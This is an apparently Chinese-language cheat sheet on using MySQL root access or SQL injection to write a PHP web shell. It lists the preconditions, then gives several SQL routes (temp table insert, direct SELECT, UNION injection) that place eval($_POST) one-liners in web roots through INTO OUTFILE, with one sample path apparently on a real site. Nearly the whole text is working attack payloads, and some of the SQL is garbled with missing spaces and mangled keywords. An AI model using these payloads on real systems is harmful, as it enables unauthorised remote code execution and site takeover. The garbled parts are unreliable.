MYSQL寫shell

利用須要知足如下條件:

1. root權限
2. GPC關閉（能使用單引號）
3. 有絕對路徑（讀文件能夠不用，寫文件必須）
4. 沒有配置–secure-file-priv
5. 成功條件：有讀寫的權限，有create、insert、select的權限

Drop TABLE IF EXISTS temp; //若是存在temp就刪掉
Create TABLE temp(cmd text NOT NULL); //創建temp表，裏面就一個cmd字段
Insert INTO temp (cmd) VALUES('<? php eval_r($_POST[cmd]);?>'); //把一句話木馬插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查詢temp表中的一句話並把結果導入到eval.php
Drop TABLE IF EXISTS temp; //刪除temp



UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*，則返回頁面上次顯示3的地方會顯示zerosoul。
也就是說若是咱們的select語句後面不帶from table語句的話，咱們說查詢的數字或字符會直接返回到查詢結果裏。

一、union寫shell
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’

no union

id=2) into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’ fields terminated by ‘<? phpinfo(); ?>’

如select * from users into outfile 'c:\1.txt' fields terminated by "<? phpinfo(); ?>"

沒成功，應該是轉義的問題
接着嘗試：

select'<?php @eval($_POST[-77]);?>'INTO OUTFILE 'E:\\Web\\xxx.xx.vn\\wp-content\\errors.php'

有了這個思路，上面那一大段到出一句話的SQL代碼能夠直接簡化到一句:

二、查詢寫馬
Select '<? php eval_r($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

 

 

三、mysql插入寫馬

 

USEtest;# MySQL 返回的查詢結果爲空(即零行)。
DROPTABLEIFEXISTStemp;# MySQL 返回的查詢結果爲空(即零行)。
CREATETABLEtemp(

 

cmdTEXTNOTNULL

);# MySQL 返回的查詢結果爲空(即零行)。
INSERTINTOtemp(cmd)
VALUES(

'<?php @eval($_POST['pass']);?>'

);# 影響列數： 1
SELECTcmd
FROMtemp
INTOOUTFILE'/home/htdocs/eval.php';# 影響列數： 1
DROPTABLEIFEXISTStemp;# MySQL 返回的查詢結果爲空(即零行)。